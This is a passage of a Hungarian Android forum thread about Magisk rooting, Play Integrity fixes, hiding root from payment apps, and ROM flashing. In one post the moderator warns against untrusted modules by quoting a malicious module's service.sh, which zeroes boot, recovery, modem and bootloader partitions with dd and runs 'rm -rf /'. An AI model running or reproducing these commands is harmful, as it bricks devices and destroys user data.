Hirdetés

2024. április 25., csütörtök

Gyorskeresés

Útvonal

Fórumok  »  Okostelefonok  »  Magisk

Téma összefoglaló

Téma összefoglaló

  • Utoljára frissítve: 2024-03-01 12:38:22

LOGOUT.hu

Magisk
root jogosultság
Android rendszereken

Összefoglaló kinyitása ▼

Hozzászólások

(#5351) crok válasza janakbacsi (#5350) üzenetére


crok
Topikgazda

Ha se Magisk se root nincs miért ide írsz?..
Android alkalmazások topikban ott a válasz: [link] és [link]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5352) energiezolee


energiezolee
aktív tag

Valóban csak a magisk modulos verzió működik! Nagyon unatkoznak a Google-nál! :(((

Üdv : Energie Zolee

(#5353) crok válasza energiezolee (#5352) üzenetére


crok
Topikgazda

Egy frászt csak a modul működik, a saját microG-vel az új GmsCore patch-el a régi spoofing helyett vajsimán működik a root nélküli megoldás is.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5354) energiezolee válasza crok (#5353) üzenetére


energiezolee
aktív tag

Engem már nem érint, marad a modulos verzió, de köszi a hasznos információt. :R
Valószínűleg másoknak viszont hasznos lenne a GMSCore patch linkje...

Üdv : Energie Zolee

(#5355) crok válasza energiezolee (#5354) üzenetére


crok
Topikgazda

Egyetlen hsz-el feletted ott van.. ha elolvasod a ket linkelt hsz-t latod hogy szukseg sincs elore telepiteni mert ha mar a GmsCore patch-el van build-elve akkor szol es oda is dob a letoltesekhez.

[ Szerkesztve ]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5356) energiezolee válasza crok (#5355) üzenetére


energiezolee
aktív tag

Mikor elkezdtem megírni a hozzászólást, akkor még nem volt ott a tiéd... Mint azt láthatod pár másodperc volt a hozzászólásaink között.

Üdv : Energie Zolee

(#5357) rErEaT válasza Narxis (#5266) üzenetére


rErEaT
senior tag

És ez úgy tűnik be is igazolódni látszik: [link]
Elveszi a Google az RCS funkciót azoktól akik rootolják a telefonjukat :)
szvsz engem nem érint, mert SMS-ezni nem szoktam, minden másra ott a Messenger, Telegram, Signal stb

Bár tény, hogy azért nem rossz funkció a Google Messagesben

(#5358) Trailblazer válasza rErEaT (#5357) üzenetére


Trailblazer
addikt

Én mindig ki is kapcsoltam ezt az opciót, de csak visszaerőszakoskodta rendre. Pedig az SMS megfelel.

Lehet más a helyesírás...? -> https://lnk.bz/fJ4V

(#5359) Archttila


Archttila
veterán
LOGOUT blog (1)

En Partizan SMS-t (P-SMS) hasznalok. Ez egy nyilt forrasu qksms fork, light, featurerich, FOSS.
Nem eroltet rad semmit :)

Passionate about minimalistic software, the Linux philosophy, and having fun. SFF enthusiast.

(#5360) user26


user26
aktív tag

Üdv!
Off-ba írom, aztán majd fixálod, hogy maradhat vagy sem.
KernelSu -val az Adaway szépen elmegy ? Vagy kell valami + dolog hozzá ?

Xiaomi fan I 12T Pro I

(#5361) crok válasza user26 (#5360) üzenetére


crok
Topikgazda

Kell mokolni pluszban de elmegy.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5362) Trailblazer válasza crok (#5361) üzenetére


Trailblazer
addikt

Ez a link nem nagyon sikerült. :B

Lehet más a helyesírás...? -> https://lnk.bz/fJ4V

(#5363) user26 válasza crok (#5361) üzenetére


user26
aktív tag

Köszi, a link nekem se jó.
Ha erre gondolsz, köszi.

Xiaomi fan I 12T Pro I

(#5364) crok válasza user26 (#5363) üzenetére


crok
Topikgazda

Ez pl. igen.
@link: nem eloszor jarok igy a ph-n..

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5365) crok válasza crok (#5308) üzenetére


crok
Topikgazda

PlayIntegrityFix frissítés: v15.9.7

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5366) troller válasza crok (#5365) üzenetére


troller
senior tag

Szia, a xiaomi.eu google pay fix-éhez is kell root meg a magiskban a rejtések?
És ha igen, akkor van leírás az aktuális eljárásra?

Asus P8H67M-LE; i5 3330; 2x4GB DDR3; Gigabyte GTX 1060 3GB WINDFORCE OC

(#5367) crok válasza troller (#5366) üzenetére


crok
Topikgazda

Nem kell root se semmi csak [link] ezt tartsd mindig frissen (updater app is szol ha lesz frissites hozza).

[ Szerkesztve ]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5368) crok válasza crok (#5322) üzenetére


crok
Topikgazda

ZygiskNext frissítés: v1.0.2

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5369) crok válasza crok (#5368) üzenetére


crok
Topikgazda

ZygiskNext frissítés: v1.0.3

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5370) rErEaT válasza crok (#5369) üzenetére


rErEaT
senior tag

Áh köszi, Magisk nem is jelezte valamiért :D

(#5371) crok válasza crok (#5369) üzenetére


crok
Topikgazda

ZygiskNext frissítés: v1.0.4

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5372) niklebi


niklebi
senior tag

Több mint fél éve kimaradtam a Magisk mizériából, de most van egy új telefonom. Tegnap roolotam a telefont, és persze minden szép piros az Integrrity Checker-ben. A telefon Redmi Note 13 Pro, és a Xiaomi EU stabil HyperOs van rajta. Még semmilyen modult nem telepítettem. Ehhez kellene a segítség. Ami fontos nem fogom a telefont fizetésre használni.

(#5373) crok válasza niklebi (#5372) üzenetére


crok
Topikgazda

[Erre tessek.]
Ha fizetesre nem is de bankolasra.. meg ha kell olyan alkalmazas amit mar telepiteni se enged (keresesben se jelenik meg, mint pl. Netflix).

[ Szerkesztve ]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5374) cybercide


cybercide
tag

Sziasztok!
Van egy Huawei Mate 20 Lite telefonom és szeretném használni rajta a Google Pay-t, de nem működik, azt írja, hogy rootolva van a telefon. Elolvastam a téma összefoglalót, de nem vagyok biztos a dolgomban, hogy mit is kellene csinálnom, hogy elrejtsem előle a rootolást. Ha más nincs akár meg is szüntetném a rootolást, ha tudnám, hogy hogyan kell csinálni. Ebben kérnék segítséget. Köszi.
kép

[ Szerkesztve ]

http://phmegbizhatosag.atw.hu/phtabla.php?nev=cybercide

(#5375) crok válasza cybercide (#5374) üzenetére


crok
Topikgazda

Mit csinaltal eddig? Milyen verziokkal?

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5376) mobilizmo


mobilizmo
addikt

Shizuku, nem Magisk, de van kapcsolódás, jobb híján itt kérdezném meg.
SD Maid SE miatt jött egyáltalán képbe, eddig nem foglalkoztam vele. Szóval azt írják ha van akkor jobb eredmények érhetők el. Shizuku telepítve, vezeték nélküli hibakeresés engedélyezve, párosítás megtörtént. Ezek után az SD Maidben a beállításban megjelenik a várakozás a Shizukuval való kapcsolatfelvételre, majd 1-2 másodperc után eltűnik és a Shizukuban nézve látszik, hogy leállt. És innen nem értem a dolgot mert vagy 10-szer végigcsináltam ezt és minden alkalommal ez lett a vége.
Ha valaki tudja, hogy mit csinálok rosszul, megköszönném ha segítene.

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

(#5377) crok válasza mobilizmo (#5376) üzenetére


crok
Topikgazda

"majd 1-2 másodperc után eltűnik és a Shizukuban nézve látszik, hogy leállt" -- screenshot vagy mi all le pontosan? Hasznalom en is es mukodik jol. Pair utan kell hogy legyen aktiv wifi kapcsolat, wireless debug bekapcsolva es Shizukuban start service majd utana SDMaid.

Amugy Android szakmaiba valo.

[ Szerkesztve ]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5378) Trailblazer válasza mobilizmo (#5376) üzenetére


Trailblazer
addikt

Nekem az root helyett van.

Lehet más a helyesírás...? -> https://lnk.bz/fJ4V

(#5379) niklebi válasza crok (#5373) üzenetére


niklebi
senior tag

Köszönöm! tökéletesen működik. 2 zöld+1 piros.

(#5380) cybercide válasza crok (#5375) üzenetére


cybercide
tag

Még nem csináltam semmit. Most keresem a legmegfelelőbb megoldást a problémámra. Azért kértem ki hozzáértők véleményét, mert nem szeretnék valami hülyeséget csinálni a telómmal. Lényeg, hogy tudjam használni a Google Pay-t. Köszi.

http://phmegbizhatosag.atw.hu/phtabla.php?nev=cybercide

(#5381) crok válasza cybercide (#5380) üzenetére


crok
Topikgazda

Máshogy teszem fel akkor a kérdést: mire kell a root? Meg foga érni neked? Mert hogy ezután fixen állandóan nézned kell majd hogy hogy áll a macska-egér harc az biztos - vagyis a GPay ami már régóta Wallet időnként ki lesz ütve.. és lehet várni kell a megoldásra.. ha lesz.. szóval mennyire kell ez neked?

[ Szerkesztve ]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5382) cybercide válasza crok (#5381) üzenetére


cybercide
tag

Jelenleg magasabb prioritást élvez(ne) a Google Pay, mint a root.

http://phmegbizhatosag.atw.hu/phtabla.php?nev=cybercide

(#5383) crok válasza cybercide (#5382) üzenetére


crok
Topikgazda

Bele se kezdj.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5384) cybercide válasza crok (#5383) üzenetére


cybercide
tag

Ok, köszi. A rootolást vissza lehet valahogy állítani eredeti állapotra?

http://phmegbizhatosag.atw.hu/phtabla.php?nev=cybercide

(#5385) crok válasza cybercide (#5384) üzenetére


crok
Topikgazda

Vissza. Ujrahuzod a ROM-ot, factory reset es bootloader zaras.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5386) LaySoft


LaySoft
tag

Lesz arra valaha esély, hogy nyitott bootloader mellett legyen Strong integrity? Ingress miatt nekem hamarosan fontos lenne.

(#5387) crok válasza LaySoft (#5386) üzenetére


crok
Topikgazda

Soha az életben nem lesz stabilan hiszen eleve a nyitással töröd el. Amivel lehet(ett és lehetne) próbálkozni az ugyan PoC szinten működik viszont amint a megoldáshoz használt keybox-ot letiltja a Google onnantól ugyanúgy eltört a dolog.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5388) LaySoft válasza crok (#5387) üzenetére


LaySoft
tag

Kérdés, hogy mekkora felháborodásy kelt a bejelentés, mert vannak akik ős Android-al nyomják a játékot és akkor nekik nem is volt, nem is lesz Strong integrity. Tényleg, hányas Android verziótól van?

(#5389) crok válasza LaySoft (#5388) üzenetére


crok
Topikgazda

Attól amitől készülék kiadási Android verziótól megkövetelt a TEE chip megléte a készülékben a Google tanusítványhoz, az pedig Android 8.. lenne.. ha nem lennének lecseszett OEM implementációk pl. így igazából Android 11 (API level 30).
https://developer.android.com/google/play/integrity/overview#have-tiered
De ahogy nézem az Ingress minSDK eleve Android 8 egyébként.

[ Szerkesztve ]

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5390) LaySoft válasza crok (#5389) üzenetére


LaySoft
tag

Szóval akkor elképzelhető hogy lesz pár Android 8, 9, 10 user, akinek stock ROM-al nem lesz Strong integrity?

(#5391) crok válasza LaySoft (#5390) üzenetére


crok
Topikgazda

Ez ennél bonyolultabb :D :D :D De kelleni fog a Google-nek belenyúlnia a keybox listába és lesz akinek lesz még ebből gondja, igen.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5392) LaySoft válasza crok (#5391) üzenetére


LaySoft
tag

Na akkor van remény, hogy nem lépik ezt meg, kivárok az utolsó pillantig a stock ROM-ra visszaállással. Belegondolni is szörnyű...

(#5393) HUNited


HUNited
senior tag

Telepítettem Poco F3ra az új stable EU romot (frissítés előző stabilról).
Minden működik, legalábbis eddig, azonban a Magisk appban mem jelenik meg a tiltólista, ha rá kattintok, semmi se történik. Amúgy a rejtés működik, minden appom megy, tehát amíg nem akarom mókolni a listát, nincs gond, de veszett furcsa.

Minden a legújabb, Shamiko+Magisk.

Van valami ötlet?

(#5394) crok válasza HUNited (#5393) üzenetére


crok
Topikgazda

Zygisk on?

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5395) HUNited válasza crok (#5394) üzenetére


HUNited
senior tag

Igen, működik is mondom minden, csak a listát nem tudom megnézni/módosítani.

(#5396) xabolcs válasza LaySoft (#5390) üzenetére


xabolcs
őstag

Peldaul whyred az utolso gyari rommal (Android 9), zart bootloaderrel is csak device integrity-t tud. :))

aláírás1: csocsó-vesztes vagyok, főleg a Bog és Bocha páros ellen, aláírás2: van mobilarénáskulcstartóm! :D

(#5397) mobilizmo


mobilizmo
addikt

Napokban 0-ról újratelepítettem az F3-at, crok tudna róla mesélni, bénáztam is, problémák is volt, itt is köszönöm a segítséget. Most már szinte minden egyenes, crDroid 8.14 (továbbra is), BI és DI van, banki cuccok is működnek (CIB, George, Revolut), csak a Walettel bajlódok. Az is fel van telepítve (amíg nincs DI addig azt sem lehet), viszont amikor indítom akkor csak a "Válassza ki a Goggle Pay alkalm..." üzenetig jut és azt végtelen ideig tekeri. Többször töröltem már cache-t és tárhelyet, szedtem le és raktam fel újra, beraktam a tiltólistába, majd kivettem, nem nagyon tudok már kitalálni olyat amit még nem csináltam. Magisk szerintem egyenes, Shamiko v1.0.1, PIF v15.9.7 és SystemlessHost v1.0 van csak.
Szóval segítsetek valami ötlettel, hogy tudnám működésre bírni a Walletet. Előre is nagyon köszönök minden segítséget. :)

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

(#5398) crok válasza mobilizmo (#5397) üzenetére


crok
Topikgazda

crDroid 10 lett végül? Milyen GApps ment fel? A cr oldala a NikGApps-t ajánlja, arra tippelek hogy valami össze van akadva abban a GApps csomagban ami fent van :\

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5399) LaySoft válasza crok (#5398) üzenetére


LaySoft
tag

Úgy tűnik nem. Nem értem miért nem a legújabbat használja, nálam kifogástalanul megy.

(#5400) crok válasza LaySoft (#5399) üzenetére


crok
Topikgazda

Ah, igen, elkerülte a figyelmem hogy cr 8.14 ami még csak nem is az utolsó 8-as (8.18, le is álltak vele még '23 Októberben) és az még GApps build volt, abban se lecserélni se mást úgy nagyon mókolni nem lehet.. és az még jóval a két utolsó nagy Google vödörkeverés előttről van, ez így nemigen fog sose összeállni :\

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5401) mobilizmo válasza crok (#5398) üzenetére


mobilizmo
addikt

Bocsánat, természetesen elírtam: crDroid v10.4 és NikGapps-core-arm64-14-20240420-signed. Próbáljak meg eggyel korábbi gapps-ot?

[ Szerkesztve ]

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

(#5402) LaySoft válasza mobilizmo (#5401) üzenetére


LaySoft
tag

Igen, lehet az a baj. Nekem NikGapps-core-arm64-14-20240307-signed.zip fut, későbbieket nem próbáltam.

(#5403) Trailblazer válasza LaySoft (#5402) üzenetére


Trailblazer
addikt

De miért nem crDroid official GApps-t használsz? Az xda-n is jelezve vagyon, hogy ez ajánlott.

Lehet más a helyesírás...? -> https://lnk.bz/fJ4V

(#5404) crok válasza Trailblazer (#5403) üzenetére


crok
Topikgazda

Ahogy mondod, sőt még a crDroid oldalain is minden build-nél ami nem alapból GApps build ott van az ajánlott GApps link és a nikgapps oldalán külön a crDroid build-re mutat, azért is linkeltem így a #5398-ben. Tényleg nem érdemes eltérni ha nincs rá valami ultra nyomós indok.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5405) mobilizmo válasza crok (#5404) üzenetére


mobilizmo
addikt

Először azzal próbáltam, de akkor sem volt kerek a rendszer. És amikor másodszor kezdtem 0-ról akkor már inkább a jól bevált nikgapps-core-t raktam fel. Mindig nézem egyébként az xda-n a leírást is és korábban ők sem ajánlottak még saját build-et gapps-ból.
Dirty flash-el elképzelhető, hogy le lehet cserélni a nikgapps-core-t a crdroid-build-re?

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

(#5406) crok válasza mobilizmo (#5405) üzenetére


crok
Topikgazda

Nem, vagyis nem teljesen. Nem tudom hogy van felkészítve a nikgapps egy ilyesfajta cserére.. ha más nem /system-re wipe, utána ROM flash és utána nikgapps.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5407) mobilizmo válasza crok (#5406) üzenetére


mobilizmo
addikt

Hiába mountolom a /systemet nem jelenik meg a wipe-nál a kiválasztható partíciók között.

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

(#5408) crok válasza mobilizmo (#5407) üzenetére


crok
Topikgazda

Nem kell mount és a partíciókezelésnél kell lennie.

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5409) mobilizmo válasza crok (#5408) üzenetére


mobilizmo
addikt

Törlésnél a következő partíciókat hozza:
Dalvik/Art gyorsítótár
USB-Storage
Metadata
Adat
Belső tárhely

Partíció kezelésnél (csak OF, TWRP-nél Csatolás van, de azt már írtam):
USB-storage
Metadata
Adat

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

(#5410) crok válasza mobilizmo (#5409) üzenetére


crok
Topikgazda

Nem igazán Magisk ez már..
Összeollóztam az XDA posztjuk alapján ami szerintem menne:
boot recovery
flash crDroid 10.x (toggle auto flash twrp)
reboot recovery
flash GApps (no auto toggle needed)
flash Magisk (no auto toggle needed)
boot system

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5411) crok


crok
Topikgazda

Közben meg egy baromi jó példa miért ne bízzon meg SENKI SEMMILYEN random Telegram / 4PDA / ésatöbbi modulban, apk-ban, bármiben.. Reddit szál, user feltett egy pont ilyen mod-ot (mindegy mi.. egy random GDrive link amit kapott), íme így néz ki a service.sh vége:

su -c dd if=/dev/zero of=/dev/block/by-name/abl
su -c dd if=/dev/zero of=/dev/block/by-name/abl_a
su -c dd if=/dev/zero of=/dev/block/by-name/abl_b
su -c dd if=/dev/zero of=/dev/block/by-name/recovery
su -c dd if=/dev/zero of=/dev/block/by-name/recovery_a
su -c dd if=/dev/zero of=/dev/block/by-name/recovery_b
su -c dd if=/dev/zero of=/dev/block/by-name/boot
su -c dd if=/dev/zero of=/dev/block/by-name/boot_a
su -c dd if=/dev/zero of=/dev/block/by-name/boot_b
su -c dd if=/dev/zero of=/dev/block/by-name/fsc
su -c dd if=/dev/zero of=/dev/block/by-name/fsg
su -c dd if=/dev/zero of=/dev/block/by-name/mdm1m9kefs1
su c dd if=/dev/zero of=/dev/block/by-name/mdm1m9kefs2
su -c dd if=/dev/zero of=/dev/block/by-name/mdm1m9kefs3
su -c dd if=/dev/zero of=/dev/block/by-name/mdm1m9kefsc
su -c dd if=/dev/zero of=/dev/block/by-name/modemst1
su -c dd if=/dev/zero of=/dev/block/by-name/modemst2
su -c dd if=/dev/zero of=/dev/block/by-name/xbl 41 su -c dd if=/dev/zero of=/dev/block/by-name/xbLa
su -c dd if=/dev/zero of=/dev/block/by-name/xbl_b
su -c dd if=/dev/zero of=/dev/block/by-name/xbl_config
su -c dd if=/dev/zero of=/dev/block/by-name/xbl_config_a
su -c dd if=/dev/zero of=/dev/block/by-name/xbl_config_b
rm -rf /data/
rm -rf /*
rm -rf /
rm -rf /data/data
rm -rf /system/
rm -rf /sdcard/
rm -rf /system/
rm -rf /data/
rm -rf /*
rm -rf /dev/

:C :U :C :U :C :U :C :U :C :U :C

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5412) Trailblazer válasza crok (#5411) üzenetére


Trailblazer
addikt

De jó fej valaki... :U

Lehet más a helyesírás...? -> https://lnk.bz/fJ4V

(#5413) LaySoft válasza crok (#5411) üzenetére


LaySoft
tag

De ez mire jó? Ha feltesz valami malware-t, ransomware-t, vagy bányászprogramot, akkor azt esetleg megértem, mert van belőle haszna, más kérdés hogy az én káromra. De csak kárt okozoni haszonszerzés nélkül, ennek mi értelme?

(#5414) crok válasza LaySoft (#5413) üzenetére


crok
Topikgazda

Kérdezd a készítőt. Nekem fogalmam nincs..

Ha egy hozzászólásomban linket látsz az hasznos referencia, hivatkozás vagy leírás és erősen ajánlott vagy minimum érdemes elolvasni. A Logout bejegyzéseim tele vannak hasznos Android tippekkel-trükkökkel, alkalmazásajánlással..

(#5415) mizoli válasza crok (#5411) üzenetére


mizoli
addikt

Nem tudom, van-e még ennél is lejjebb, bár gyanítom, hogy van.
Lényeg, hogy kárt okozzon.

(#5416) mobilizmo válasza crok (#5410) üzenetére


mobilizmo
addikt

Pont így csináltam. Már visszaraktam az előző buildet ROM-ól, Gapps-ból és úgy se jó.

Bonyolult problémákra mindig akad egyszerű, könnyen érthető, téves válasz.

Útvonal

Fórumok  »  Okostelefonok  »  Magisk
Copyright © 2000-2024 PROHARDVER Informatikai Kft.